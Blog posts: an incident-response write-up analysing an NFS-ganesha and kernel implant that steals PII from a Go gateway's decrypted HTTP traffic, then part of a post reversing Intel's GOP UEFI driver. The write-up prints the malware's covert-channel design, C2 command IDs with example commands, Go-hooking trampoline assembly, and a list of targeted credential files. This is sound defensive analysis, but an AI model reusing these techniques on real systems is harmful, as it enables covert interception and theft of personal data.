A few weeks ago an ordinary security assessment turned into an incident response whirlwind. It was definitely a first for me, and I was kindly granted permission to outline the events in this blog post. This investigation started scary but turned out be quite fun, and I hope reading it will be informative to you too. I'll be back to posting about my hardware research soon.

How it started

Twice a year I am hired to do security assessments for a specific client. We have been working together for several years, and I had a pretty good understanding of their network and what to look for.

This time my POC, Klaus, asked me to focus on privacy issues and GDPR compliance. However, he asked me to first look at their cluster of reverse gateways / load balancers:

LB Architecture

I had some prior knowledge of these gateways, but decided to start by creating my own test environment first. The gateways run a custom Linux stack: basically a monolithic compiled kernel (without any modules), and a static GOlang application on top. The 100+ machines have no internal storage, but rather boot from an external USB media that has the kernel and the application. The GOlang app serves in two capacities: an init replacement and the reverse gateway software. During initialization it mounts /proc, /sys, devfs and so on, then mounts an NFS share hardcoded in the app. The NFS share contains the app's configuration, TLS certificates, blacklist data and a few more. It starts listening on 443, filters incoming communication and passes valid requests on different services in the production segment.

GW Architecture

I set up a self contained test environment, and spent a day in black box examination. Having found nothing much I suggested we move on to looking at the production network, but Klaus insisted I continue with the gateways. Specifically he wanted to know if I could develop a methodology for testing if an attacker has gained access to the gateways and is trying to access PII (Personally Identifiable Information) from within the decrypted HTTP stream.

I couldn't SSH into the host (no SSH), so I figured we will have to add some kind of instrumentation to the GO app. Klaus still insisted I start by looking at the traffic before (red) and after the GW (green), and gave me access to a mirrored port on both sides so I could capture traffic to a standalone laptop he prepared for me and I could access through an LTE modem but was not allowed to upload data from:

GW Architecture

The problem I faced now was how to find out what HTTPS traffic corresponded to requests with embedded PII. One possible avenue was to try and correlate the encrypted traffic with the decrypted HTTP traffic. This proved impossible using timing alone. However, unspecting the decoded traffic I noticed the GW app adds an 'X-Orig-Connection' with the four-tuple of the TLS connection! Yay!

Original connection

I wrote a small python program to scan the port 80 traffic capture and create a mapping from each four-tuple TLS connection to a boolean - True for connection with PII and False for all others:

10.4.254.254,443,[Redacted],43404,376106847.319,False
10.4.254.254,443,[Redacted],52064,376106856.146,False
10.4.254.254,443,[Redacted],40946,376106856.295,False
10.4.254.254,443,[Redacted],48366,376106856.593,False
10.4.254.254,443,[Redacted],48362,376106856.623,True
10.4.254.254,443,[Redacted],45872,376106856.645,False
10.4.254.254,443,[Redacted],40124,376106856.675,False 
...

With this in mind I could now extract the data from the PCAPs and do some correlations. After a few long hours getting scapy to actually parse timestamps consistently enough for comparisons, I had a list of connection timing information correlated with PII. A few more fun hours with Excel and I got histogram graphs of time vs count of packets. Everything looked normal for the HTTP traffic, although I expected more of a normal distribution than the power-low type thingy I got. Port 443 initially looked the same, and I got the normal distribution I expected. But when filtering for PII something was seriously wrong. The distribution was skewed and shifted to longer time frames. And there was nothing similar on the port 80 end.

Histograms

My only explanation was that something was wrong with my testing setup (the blue bars) vs. the real live setup (the orange bars). I wrote on our slack channel 'I think my setup is sh*t, can anyone resend me the config files?', but this was already very late at night, and no one responded. Having a slight OCD I couldn’t let this go. To my rescue came another security? feature of the GWs: Thet restarted daily, staggered one by one, with about 10 minutes between hosts. This means that every ten minutes or so one of them would reboot, and thus reload it’s configuration files over NFS. And since I could see the NFS traffic through the port mirror I had access to, I recokoned I could get the production configuration files from the NFS capture (bottom dotted blue line in the diagram before).

So to cut a long story short I found the NFS read reply packet, and got the data I need. But … why the hack is eof 77685??? Come on people, its 3:34AM!

What's more, the actual data was 77685 bytes, exactly 8192 bytes more then the β€˜Read length’. The entropy for that data was pretty uniform, suggesting it was encrypted. The file I had was definitely not encrypted.

First NFS capture

Histogram of extra 8192 bytes:

NFS capture hist

When I mounted the NFS export myself I got a normal EOF value of 1!

NFS capture hist

What hell is this?

Comparing the capture from my testing machine with the one from the port mirror I saw something else weird:

NFS capture hist

For other NFS open requests (on all of my test system captures and for other files in the production system) we get:

NFS capture hist

Spot the difference?

The open id: string became open-id:. Was I dealing with some corrupt packet? But the exact same problem reappeared the next time blacklist.db was send over the wire by another GW host.

Time to look at the kernel source code:

NFS capture hist

The β€œopen id” string is hardcoded. What's up?

After a good night sleep and no beer this time I repeated the experiment and convincing myself I was not hullucinating I decided to compare the source code of the exact kernel version with the kernel binary I got.

What I expected to see was this (from nfs4xdr.c):

static inline void encode_openhdr(struct xdr_stream *xdr, const struct nfs_openargs *arg)
{
    __be32 *p;
 /*
 * opcode 4, seqid 4, share_access 4, share_deny 4, clientid 8, ownerlen 4,
 * owner 4 = 32
 */
    encode_nfs4_seqid(xdr, arg->seqid);
    encode_share_access(xdr, arg->share_access);
    p = reserve_space(xdr, 36);
    p = xdr_encode_hyper(p, arg->clientid);
    *p++ = cpu_to_be32(24);
    p = xdr_encode_opaque_fixed(p, "open id:", 8);
    *p++ = cpu_to_be32(arg->server->s_dev);
    *p++ = cpu_to_be32(arg->id.uniquifier);
    xdr_encode_hyper(p, arg->id.create_time);
}

Running binwalk -e -M bzImage I got the internal ELF image, and opened it in IDA. Of course I didn’t have any symbols, but I got nfs4_xdr_enc_open() from /proc/kallsyms, and from there to encode_open() which led me to encode_openhdr(). With some help from hex-rays I got code that looked very similiar, but with one key difference:

static inline void encode_openhdr(struct xdr_stream *xdr, const struct nfs_openargs *arg)
{
    ...
    p = xdr_encode_opaque_fixed(p, unknown_func("open id:", arg), 8);
    ...
}

The function unknown_func was pretty long and complicated but eventually sometimes decided to replace the space between 'open' and 'id' with a hyphen.

Does the NFS server care? Apparently this string it is some opaque client identifier that is ignored by the NFS server, so no one would see the difference. That is unless they were trying to extract something from an NFS stream, and obviously this was not a likely scenario. OK, back to the weird 'eof' thingy from the NFS server.

The NFS Server

The server was running the 'NFS-ganesha-3.3' package. This is a very modular user-space NFS server that is implemented as a series of loadable modules called FSALs. For example support for files on the regular filesystem is implemented through a module called libfsalvfs.so. Having verified all the files on disk had the same SHA1 as the distro package, I decided to dump the process memory. I didn't have any tools on the host, so I used GDB which helpfully was already there. Unexpectadly GDB was suddenly killed, the file I specified as output got erased, and the nfs server process restarted.

I took the dump again but there was nothing special there!

I was pretty suspicious at this time, and wanted to recover the original dump file from the first dump. Fortunately for me I was dumping the file to the laptop, again over NFS. The file had been deleted, but I managed to recover it from the disk on that server.

2nd malicious binary

The memory dump was truncated, but had a corrupt version of NFS-ganesha inside. There were two libfsalvfs.so libraries loaded: the original one and an injected SO file with the same name. The injected file was clearly malicious. The main binary was patched in a few places, and the function table into libfsalvfs.so as replaced with the alternate libfsalvfs.so. The alternate file was compiled from NFS-ganesha sources, but modified to include new and improved (wink wink) functionality.

The most interesting of the new functionality were two separate implementations of covert channels.

The first one we encountered already:

  • When an open request comes in with 'open-id' instead of 'open id', the file handle is marked. This change is opaque to the NFS server, so unpatched servers just ignore it and nothing much happens.
  • For infiltrated NFS server, when the file handle opened this way is read, the NFS server appends the last block with a payload coming from the malware's runtime storage, and the 'eof' on-the-wire value is changed to be the new total size. An unpatched kernel (which shouldn’t really happen, since it marked the file in the first place) will just ignore the extra bytes. The EOF value is used as a bool, e.g. checked for 0 or not and not a specific value, so having a large integer values doesn’t change anything in the flow of an unmodified kernel.

The second covert channel is used for command and control, and is implemented in the VFS code as a fake directory.

Any writes to /<export>/.snapshot/meta/<cmdid> are handled by the malware code and not passed on to the FS. They are pseudo-files that implement commands through read and write operations.

The malware implemented the following commands:

  • 1701 - self destruct
  • 1702 - set auto self destruct time
  • 1703 - run shell command
  • 1704 - load SO file from buffer specified in command
  • 1706 - get basic system description
  • 1707 - get network connections
  • 170A - upgrade to new SO file
  • 74201 - put buffer in memory dict by ID
  • 74202 - get buffer from memory dict by ID
  • 74650 - put a payload in memory for the first covert channel
  • 74651 - arm the first covert channel
  • 74652 - disarm the first covert channel

For example cp payload.so /mnt/server/.snapshot/meta/1704 will load the SO file in the NFS ganesha process on the target server, and echo 1616580589 > /mnt/server/.snapshot/meta/1702 will set an autodestruct time. Reading this file will retrieve the time.

The self destruct command (0x1701) is very interesting - it sends a UDP broadcast on port 41701 with a random payload of size 321 bytes, and then restarts a clean NFS-ganesha. I guess this is some kind of network signalling.

It appears the malware has a watchdog that iterates over all /proc/<pid>/fd/* links every 25ms, and if a link is open to /proc/<malware pid>/maps or /proc/<malware pid>/smaps or /proc/<malware pid>/mem it:

  • kills the offending process,
  • deletes any writeable file handle it had opened (before it was killed) in /proc/<pid>/fd/, first trying to wipe it,
  • calls the self destruct command (0x1701).

Further forensics

Lets go back to that awful Saturday I triggered the self-destruct. Having a faint understanding I triggered something (that being before I reversed the devil) I asked Klaus to disconnect all the network connections to the outer world and we started taking memory dumps of whatever we could, storing them all on the laptop. In hindsight we destroyed quiet a bit of evidence by triggering more self destructs in other subnets, but I think the self destruct signal has already gone out to the bad guys through a different piece of malware that I later partially recovered, and probably "heard" the UDP distress signal (that's what is was called in the binary, not my naming).

After getting all the forensics the client insisted on reconnecting his systems to the web, they were "losing money". I switched from forensics to reversing. In the process, while inspecting the malicious libfsalvfs.so I discovered the commands I mentioned above, and discovered a "feature" that helped me fill more paces of the puzzle.

Reversing malware you always find some feeble attempt to obfuscate string using XOR or RC4, or just scrambling the letter ordering. In this case I pretty quickly found a function I called get_obfuscated_string(buffer, string_id). The difference however, was that this one was just horrendous, practically irreversible:

NFS capture hist

It had like a billion nested switches:

NFS capture hist

I think they let some intern fresh out of college write that one. It seems the complete list of strings used by the tool are encoded inside in a tree of nested switches, with a variable length encoding, e.g. in one branch the 2nd level might have 3 bits and in another it might have 5 and in a third only a single bit. Some kind of prefix tree if I remember anything from Uni.

Eventually I managed to write code to just brute force the function:

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string>
#include <set>

int main(int argc, char* argv[])
{
	// error handling code omitted
	const char* filename = (argc > 1) ? argv[1] : "reconstructed.elf";
	unsigned long offset = (argc > 1) ? strtol(argv[2], NULL, 16) : 0x22a0;

	int fd = open(filename, O_RDONLY);
	struct stat stbuf;
	fstat(fd, &stbuf);
	const char* addr = (char*)mmap(NULL, stbuf.st_size, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0);
	close(fd);
	const char* base = addr + offset;

	typedef int (*entry_t)(char* outbuf, int id);
	entry_t entry = (entry_t)base;
	std::set<std::string> found;
	char buffer[1024];
	
	for(long bits = 1; bits < 64; ++ bits) {
		bool any_new = false;
		for(long id = (bits == 1) ? 0 : (1 << (bits - 1)); id < (1<<bits); ++ id) {
			int status = entry(buffer, id);
			if(status == 0)
				continue;
			if(found.find(buffer) != found.end())
				continue;
			found.insert(buffer);
			printf("Got '%s'! [0x%x]\n", buffer, id);
			any_new = true;
		}
		if(!any_new)
			break;
	}

	return 0;
}

This first binary had the following strings (I am keeping 3 to myself as they have client related info):

'/proc/self/mem', 
'/proc/self/maps',
'/proc/self/cwd',
'/proc/self/environ',
'/proc/self/fd/%d',
'/proc/self/fdinfo/%d',
'/proc/self/limits',
'/proc/self/cgroup',
'/proc/self/exe',
'/proc/self/cmdline',
'/proc/self/mounts',
'/proc/self/smaps',
'/proc/self/stat',
'/proc/%d/mem', 
'/proc/%d/maps',
'/proc/%d/cwd',
'/proc/%d/environ',
'/proc/%d/fd/%d',
'/proc/%d/fdinfo/%d',
'/proc/%d/limits',
'/proc/%d/cgroup',
'/proc/%d/exe',
'/proc/%d/cmdline',
'/proc/%d/mounts',
'/proc/%d/smaps',
'/proc/%d/stat',        
'nfs',
'nfs4',
'tmpfs',
'devtmpfs',
'procfs',
'sysfs',
'WSL2',
'/etc/os-release',
'/etc/passwd',
'/etc/lsb-release',
'/etc/debian_version',
'/etc/redhat-release',
'/home/%s/.ssh',
'/var/log/wtmp',
'/var/log/syslog',
'/var/log/auth.log',
'/var/log/cron.log',
'/var/log/syslog.log',
'/etc/netplan/*.yaml',
'/etc/yp.conf',
'/var/yp/binding/',
'/etc/krb5.conf',
'/var/kerberos/krb5kdc/kdc.conf',
'/var/log/ganesha.log',
'/etc/ganesha/ganesha.conf',
'/etc/ganesha/exports',
'/etc/exports',
'Error: init failed',
'DELL',
'/usr/lib/x86_64-linux-gnu/libnfs.so.4',
'/tmp/.Test-unix/.fa76c5adb8c04239ff3034106842773b',
'Error: config missing',
'Error: sysdep missing',
'Running',
'LOG',
'/usr/lib/x86_64-linux-gnu/ganesha/libfsalvfs.so',
'none',
'/etc/sudoers',
'/proc/net/tcp',
'/proc/net/udp',
'/etc/selinux/config',
'libdl.so.2',
'libc-',
'.so',
'cluster-config',
'recovery-signal',

Eureka Moment

Staring endlessly at this weird function I thought to myself: maybe I can look for code that is structured like this in all the dumps we obtained. We have all those block of mov byte ptr [rdi+?], '?':

MoveRDI

So lets look for blocks of code that are highly dense with these opcodes:

import sys

with open(sys.argv[1], 'rb') as f:
    data = f.read()

STATE=None
for i in range(len(data) - 6):
    if ord(data[i]) == 0xc6 and ord(data[i + 1]) == 0x47:
        if STATE and (STATE[0] + STATE[1] + 0x40) >= i:
            STATE[1] = i - STATE[0]
            STATE[2] += 1
        else:
            if STATE and STATE[2] >= 20:
                print('Found region at 0x%x - 0x%x' % (STATE[0], STATE[0] + STATE[1]))
            STATE = [i, 4, 1] 

And I found them. Oh I did. Some adjustment even led to a version for ARM systems:

MoveRDIARM

The GOlang thingy

I finally found the payload that was sent over to the GW machines. It had 2 stages: the first was the 8192 buffer loaded through the first covert channel. The kernel was modified to inject this buffer into the GOlang application and hook it. This will get fairly technical, but I enjoyed it and so will you:

  • First note that in the Golang stdlib an HTTP connection can be read through the net/http.(connReader).Read function. The calls are made through a io.Reader interface, so the calls are made through a virtual table, and the call locations cannot be statically identified.
  • the kernel inject begins by allocating a bunch of RWX memory immediately after the GOlang binary - let's call it the trampoline area, and it will include two types of generated trampoline functions,
  • Next the ELF symbol table was used to find the 'net/http.(*connReader).Read' symbol,
  • What we’ll call the 1st trampoline function (code below) is copied to the trampoline area, patching the area marked with HERE with the first 9 bytes of net/http.(\*connReader).Read
  • mprotect(net_http_connReader_read & ~0xfff, 8192, PROT_EXEC | PROT_READ | PROT_WRITE)
  • modified the beginning of net/http.(\*connReader).Read to a near jump into the trampoline - using 5 bytes of the 9 original used by 'move rcx, fs:….' that are the preamble to function.

First trampoline function

     pop     rax            
     pop     rcx
     push    rcx
     push    rax
     mov     r11, cs:qword_<relocated>
     mov     rdi, rcx
     call    qword ptr [r11+8]
     pop     rax
     pop     rcx
     push    rcx
     mov     rcx, fs:0FFFFFFFFFFFFFFF8h <---- HERE
     cmp     rsp, [rcx+10h]
     jmp     rax
  • When the trampoline is called (from the new near jump in the beginning of net/http.(*connReader).Read) it examines the stack to locate the return address, and checks if a second type of trampoline we'll refer to as the return trampoline has already been allocated for the return address for the function,
  • If not it allocates a new trampoline per call location of net/http.(*connReader).Read from the code below, replacing 123456789ABCDEFh with the absolute address of a function in the malware,
  • GOlang uses memory for all function argument passing, so immediately after the virtual function call to Read() there will always be a 5 byte mov reg, [rsp+?] to load Read()'s result into a register. This mov instruction is copied into the first db 5 dup(0) area,
  • those same 5 bytes are then replacing with a near jump to the 2nd trampoline
  • the 2nd db 5 dup(0) are filled with a relative near jmp back to the original code patch site.
        mov     rax, 123456789ABCDEFh
        mov     rdi, rsp
        call    rax
        db 5 dup(0)
        db 5 dup(0)      
    

This way eventually all the net/http.(*connReader).Read call sites are patched to call a function immediatly after net/http.(*connReader).Read virtual call returns. This lets the malicous code inspect the decoded HTTP packet.

On initialization the 1st stage malware also loads the hefty 2nd stage through the 2nd covert channel, and passes each buffer received from the patch on net/http.(*connReader).Read to it for inspection. The data collected is collected and compressed by the malware and stored back to the NFS server (the 2nd covert channel which bypasses read ACLs on NFS).

Before this case I did not think there was any nice way to hook random GO binaries, this technique is pretty cool.

Unfortunatly I cannot discuss what the 2nd payload actually as it will reveal stuff my employer isn't ready for yet.

How the kernel got patched? and why not the golang app?

The golang app is built inside the CI/CD network segment. This segment can only be accessed through monitored jump hosts with MFA. Each day, the CI/CD pipline clones the source code from the GIT server, builds it, and automatically tests it in a pre-production segment. Once tested it gets digitally signed and uploaded to the NFS server. The running app self updates, checking the digital signature beforehand.

The kernel, on the other hand, is manually built by the guy responsible for it on his own laptop. He then digitally signs it and stores it on a server where it is used by the CI/CD pipeline. Fortunatly for us a commented out line in a script in the CI/CD pipline (a line that was not commented out in the GIT!) did not delete old versions of the kernel and we know which versions were tampered with.

We noticed a 3 month gap about 5 month ago, and it corresponded with the guy moving the kernel build from a Linux laptop to a new Windows laptop with a VirtualBox VM in it for compiling the kernel. It looks as if it took the attackers three months to gain access back into the box and into the VM build.

What we have so far

We found a bunch of malware sitting in the network collecting PII information from incoming HTTPS connection after they are decoded in a GOlang app. The data is exfiltrated through the malware network and eventually is sent to the bad guys. We have more info but I am still working on it, expect another blog post in the future with more details, samples, etc’.

Q&A

  • Q: What was the initial access vector?

    A: We have a pretty good idea, but I cannot publish it yet (RD and stuff). Stay tuned!

  • Q: Why didn't you upload anything to VT yet?

    A: A few reasons:

    • I need to make sure no client info is in the binaries - some of the binaries have hardcoded strings that cannot be shared
    • All of the binaries I have have been reconstructed from memory dumps, so are not in their original form. Does anyone know how to upload partial dumps into VT?
  • Q: It there a security vulnerability in GO? in the Kernel?

    A: Defenitly not! this is just an obnoxious attacker doing what obnoxious attacker do. I might even say the complexity of the stuff means they don’t have a 0day for this platform.

  • Q: What about YARA rules, C2 address, etc'?

    A: Wait for it, there is a lot more coming!

  • Q: Why did you publish instead of collecting more?

    A: To quote the client "I don't care who else they are attacking. I just want them off my lawn!", and he thinks publishing will prevent them from returning to THIS network. Hopefully what we publish next time will get them off other people’s lawns.

  • Q: Any Windows malware?

    A: Definitly, including what we believe is an EDR bypass. Still working on it.

  • Q: Any zero days?

    A: Maybe …

  • Q: Who are these bad guys you keep refering to?

    A: No clue. Didn’t find anything similiar published. There is now sure way to make anything except unsubstantiated guesses, and I won’t do that.

To be continued.

Security of the Intel Graphics Stack - Part 2 - FW <-> GuC

24 February 2021 at 05:00

Today we'll continue our voyage into the graphics subsystem components.

The question we'll try to answer is what kind of communications occur between the GuC and the rest of the system. In this post we'll look at firmware components and next post at Windows components.

For a reminder what the GuC is, look at part1 post .

Part 1: The IntelGOP DXE driver

The Intel Graphics Output Protocol (GOP) EFI DXE driver can be extracted in various versions from many UEFI capsules available through many vendors. For this post I redid my original analysis on a recent version from a CanonLake system.

The purpose of this exercise is to try and see whether the GOP driver communicates with the GuC over the PCIe bus (TL;dr: it doesn't)

The binary isn't to large - 84KB, so we can try to completely reverse engineer it. I used both IDA+HexRays and a dynamic analysis UEFI emulator I developed for just these cases. The emulator lets you run EFI DXE drivers in Windows simulating many UEFI services and allowing me to modify/inspect EFI interfaces, hook UEFI protocol structs, and even has some fuzzing capabilities.

Looking at the driver's entrypoint we see it stores the different service tables in globals and then jumps to the main() functions I called GopEntryPoint().

.text:0000000000001580 ; EFI_STATUS __fastcall ModuleEntryPoint(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
.text:0000000000001580                 public _ModuleEntryPoint
.text:0000000000001580 _ModuleEntryPoint proc near             ; DATA XREF: HEADER:00000000000000E8↑o
.text:0000000000001580                 sub     rsp, 28h
.text:0000000000001584                 mov     r8, [rdx+60h]
.text:0000000000001588                 mov     rax, [rdx+58h]
.text:000000000000158C                 mov     cs:gIMAGE_HANDLE, rcx
.text:0000000000001593                 mov     cs:gBOOT_SERVICES, r8
.text:000000000000159A                 mov     cs:gRUNTIME_SERVICES, rax
.text:00000000000015A1                 mov     cs:gBOOT_SERVICES2, r8
.text:00000000000015A8                 mov     cs:gSYSTEM_TABLE2, rdx
.text:00000000000015AF                 call    GopEntryPoint
.text:00000000000015B4                 add     rsp, 28h
.text:00000000000015B8                 retn
.text:00000000000015B8 _ModuleEntryPoint endp

GopEntryPoint() first part is really boring, just setting up version information in global strings.

_int64 __fastcall GopEntryPoint(EFI_HANDLE img_handle_arg)
{
  EFI_HANDLE image_handle; // rbx
  CHAR16 *driver_desc_ptr; // rax
  __int64 img_handle; // r11
  __int64 result; // rax
  EFI_HANDLE Handle; // [rsp+50h] [rbp+18h]
  EFI_LOADED_IMAGE_PROTOCOL *Interface; // [rsp+58h] [rbp+20h]

  image_handle = img_handle_arg;
  v2 = atoi(L"0") == 1;
  driver_desc_ptr = gDriverDescription;
  v4 = 'I';
  byte_142A0 = v2;
  do
  {
    *driver_desc_ptr = v4;
    ++driver_desc_ptr;
    v4 = *(CHAR16 *)((char *)driver_desc_ptr + (char *)L"Intel(R) GOP Driver" - (char *)gDriverDescription);
  }
  while ( v4 );
  *driver_desc_ptr = 0;
  strcat(gDriverDescription, L" [");
  strcat(gDriverDescription, L"11");
  strcat(gDriverDescription, L".");
  strcat(gDriverDescription, L"0");
  strcat(gDriverDescription, L".");
  strcat(gDriverDescription, L"1014");
  strcat(gDriverDescription, L"]");
  gDriverState.ImgHandle = img_handle;
  v12 = &gDriverVersion;
  v13 = '1';
  do
  {
    *v12 = v13;
    ++v12;
    v13 = *(CHAR16 *)((char *)v12 + (char *)L"11" - (char *)&gDriverVersion);
  }
  while ( v13 );
  *v12 = 0;
  strcat(&gDriverVersion, L".");
  strcat(&gDriverVersion, L"0");
  strcat(&gDriverVersion, L".");
  strcat(&gDriverVersion, L"1014");
  gDriverState.ControllerName = (__int64)L"Intel(R) Graphics Controller";
  gDriverState.DriverVersion = v17;
  atoi(L"11");
  atoi(L"0");
  v18 = atoi(L"1014");

The second part does the actual work. First it looks for the EFI_LOADED_IMAGE_PROTOCOL to setup a the unload routine:

  gDRIVER_BINDING_PROTOCOL.Version = v18 + v19;
  result = gBOOT_SERVICES->OpenProtocol(
             image_handle,
             &EFI_LOADED_IMAGE_PROTOCOL_GUID,
             (void **)&Interface,
             image_handle,
             image_handle,
             2u);
  if ( result >= 0 )
  {
    Interface->Unload = (EFI_IMAGE_UNLOAD)UnloadImage;

And then install four protocol handlers, three of which I identified: one for driver binding and two for component name handling. The InstallMultipleProtocolInterfaces(..) can accept multiple protocols, each protocol has a GUID and the β€œvirtual table” like structure used by UEFI. The final entry is NULL. Most UEFI protocol GUIDs are public (and appear in the EDK) so we can identify them easily and this identify the virtual table structures associated with them, for example for the UEFI binding protocol we have in DriverBinding.h:

#define EFI_DRIVER_BINDING_PROTOCOL_GUID \
	{0x18A031AB,0xB443,0x4D1A,0xA5,0xC0,0x0C,0x09,0x26,0x1E,0x9F,0x71}

GUID_VARIABLE_DECLARATION(gEfiDriverBindingProtocolGuid, EFI_DRIVER_BINDING_PROTOCOL_GUID);

typedef struct _EFI_DRIVER_BINDING_PROTOCOL EFI_DRIVER_BINDING_PROTOCOL;

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_SUPPORTED) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This, 
	IN EFI_HANDLE ControllerHandle,
	IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath OPTIONAL
);

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_START) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This,
	IN EFI_HANDLE ControllerHandle,
	IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath OPTIONAL
);

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_STOP) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This,
	IN EFI_HANDLE ControllerHandle,
	IN UINTN NumberOfChildren,
	IN EFI_HANDLE *ChildHandleBuffer OPTIONAL
);

struct _EFI_DRIVER_BINDING_PROTOCOL {
	EFI_DRIVER_BINDING_PROTOCOL_SUPPORTED Supported;
	EFI_DRIVER_BINDING_PROTOCOL_START Start;
	EFI_DRIVER_BINDING_PROTOCOL_STOP Stop;
	UINT32 Version;
	EFI_HANDLE ImageHandle;
	EFI_HANDLE DriverBindingHandle;
};

This enables us to reverse the rest of GopEntryPoint:

    Handle = image_handle;
    gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
      &Handle,
      &EFI_DRIVER_BINDING_PROTOCOL_GUID,
      &gDRIVER_BINDING_PROTOCOL,
      &EFI_COMPONENT_NAME2_PROTOCOL_GUID,
      &gCOMPONENT_NAME2_PROTOCOL,
      0i64);
    gDRIVER_BINDING_PROTOCOL.DriverBindingHandle = Handle;
    gDRIVER_BINDING_PROTOCOL.ImageHandle = image_handle;
    gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
      &gDRIVER_BINDING_PROTOCOL.DriverBindingHandle,
      &UNKNOWN_PROTOCOL_GUID,
      &gDriverState.unknwon_proto,
      0i64);
    result = gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
               &gDRIVER_BINDING_PROTOCOL.DriverBindingHandle,
               &GOP_COMPONENT_NAME2_PROTOCOL_GUID,
               &gGOP_COMPONENT_NAME2_PROTOCOL,
               0i64);
    if ( result >= 0 )
      qword_142B0 = (__int64)image_handle;
  }
  return result;
}

All the GUID values appear close to each other at the beginning of the binary, so we can take a shortcut and find all the GUIDs the driver uses:

.text:0000000000000240 EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID dd 9042A9DEh            ; Data1
.text:0000000000000240                                         ; DATA XREF: HEADER:00000000000000EC↑o
.text:0000000000000240                                         ; HEADER:00000000000001D4↑o ...
.text:0000000000000240                 dw 23DCh                ; Data2
.text:0000000000000240                 dw 4A38h                ; Data3
.text:0000000000000240                 db 96h, 0FBh, 7Ah, 0DEh, 0D0h, 80h, 51h, 6Ah; Data4
.text:0000000000000250 EFI_EDID_ACTIVE_PROTOCOL_GUID dd 0BD8C1056h           ; Data1
.text:0000000000000250                                         ; DATA XREF: InstallGraphicsProto+124↓o
.text:0000000000000250                                         ; uninstall2?+9B↓o ...
.text:0000000000000250                 dw 9F36h                ; Data2
.text:0000000000000250                 dw 44ECh                ; Data3
.text:0000000000000250                 db 92h, 0A8h, 0A6h, 33h, 7Fh, 81h, 79h, 86h; Data4
.text:0000000000000260 EFI_EDID_DISCOVERED_PROTOCOL_GUID dd 1C0C34F6h            ; Data1
.text:0000000000000260                                         ; DATA XREF: sub_1CA4+2A5↓o
.text:0000000000000260                                         ; InstallGraphicsProto+DF↓o ...
.text:0000000000000260                 dw 0D380h               ; Data2
.text:0000000000000260                 dw 41FAh                ; Data3
.text:0000000000000260                 db 0A0h, 49h, 8Ah, 0D0h, 6Ch, 1Ah, 66h, 0AAh; Data4
.text:0000000000000270 GOP_DISPLAY_BRIGHTNESS_PROTOCOL_GUID dd 6FF23F1Dh            ; Data1
.text:0000000000000270                                         ; DATA XREF: sub_1F78+B1↓o
.text:0000000000000270                                         ; uninstall2?+14B↓o ...
.text:0000000000000270                 dw 877Ch                ; Data2
.text:0000000000000270                 dw 4B1Bh                ; Data3
.text:0000000000000270                 db 93h, 0FCh, 0F1h, 42h, 0B2h, 0EEh, 0A6h, 0A7h; Data4
.text:0000000000000280 GOP_DISPLAY_BIST_PROTOCOL_GUID dd 0F51DD33Ah           ; Data1
.text:0000000000000280                                         ; DATA XREF: sub_1F78+75↓o
.text:0000000000000280                                         ; uninstall2?+F5↓o ...
.text:0000000000000280                 dw 0E57Fh               ; Data2
.text:0000000000000280                 dw 4020h                ; Data3
.text:0000000000000280                 db 0B4h, 66h, 0F4h, 0C1h, 71h, 0C6h, 0E4h, 0F7h; Data4
.text:0000000000000290 EFI_PCI_IO_PROTOCOL_GUID dd 4CF5B200h            ; Data1
.text:0000000000000290                                         ; DATA XREF: DriverBindingProtoSupported+CB↓o
.text:0000000000000290                                         ; DriverBindingProtoSupported+173↓o ...
.text:0000000000000290                 dw 68B8h                ; Data2
.text:0000000000000290                 dw 4CA5h                ; Data3
.text:0000000000000290                 db 9Eh, 0ECh, 0B2h, 3Eh, 3Fh, 50h, 2, 9Ah; Data4
.text:00000000000002A0 GOP_COMPONENT_NAME2_PROTOCOL_GUID dd 651B7EBDh            ; Data1
.text:00000000000002A0                                         ; DATA XREF: GopEntryPoint+22F↓o
.text:00000000000002A0                 dw 0CE13h               ; Data2
.text:00000000000002A0                 dw 41D0h                ; Data3
.text:00000000000002A0                 db 82h, 0E5h, 0A0h, 63h, 0ABh, 0BEh, 9Bh, 0B6h; Data4
.text:00000000000002B0 UNKNOWN_PROTOCOL_GUID dd 0DBCB2FCDh           ; Data1
.text:00000000000002B0                                         ; DATA XREF: UnloadImage+9A↓o
.text:00000000000002B0                                         ; GopEntryPoint+203↓o
.text:00000000000002B0                 dw 0E29Ah               ; Data2
.text:00000000000002B0                 dw 410Eh                ; Data3
.text:00000000000002B0                 db 9Dh, 0D9h, 0FAh, 9Dh, 5Fh, 0F4h, 0CDh, 0A7h; Data4
.text:00000000000002C0 MAYBE_AUX_PROTOCOL_GUID? dd 0C7D4703Bh           ; Data1
.text:00000000000002C0                                         ; DATA XREF: DriverBindingProtoStartImp+2A8↓o
.text:00000000000002C0                                         ; DriverBindingProtoStop+70↓o
.text:00000000000002C0                 dw 0F36h                ; Data2
.text:00000000000002C0                 dw 4E51h                ; Data3
.text:00000000000002C0                 db 0A9h, 83h, 5Eh, 61h, 0ACh, 0B8h, 68h, 3Ch; Data4
.text:00000000000002D0 EFI_DEVICE_PATH_PROTOCOL_GUID dd 9576E91h             ; Data1
.text:00000000000002D0                                         ; DATA XREF: DriverBindingProtoSupported+5F↓o
.text:00000000000002D0                                         ; DriverBindingProtoSupported+A2↓o ...
.text:00000000000002D0                 dw 6D3Fh                ; Data2
.text:00000000000002D0                 dw 11D2h                ; Data3
.text:00000000000002D0                 db 8Eh, 39h, 0, 0A0h, 0C9h, 69h, 72h, 3Bh; Data4
.text:00000000000002E0 ; EFI_GUID EFI_LOADED_IMAGE_PROTOCOL_GUID
.text:00000000000002E0 EFI_LOADED_IMAGE_PROTOCOL_GUID dd 5B1B31A1h            ; Data1
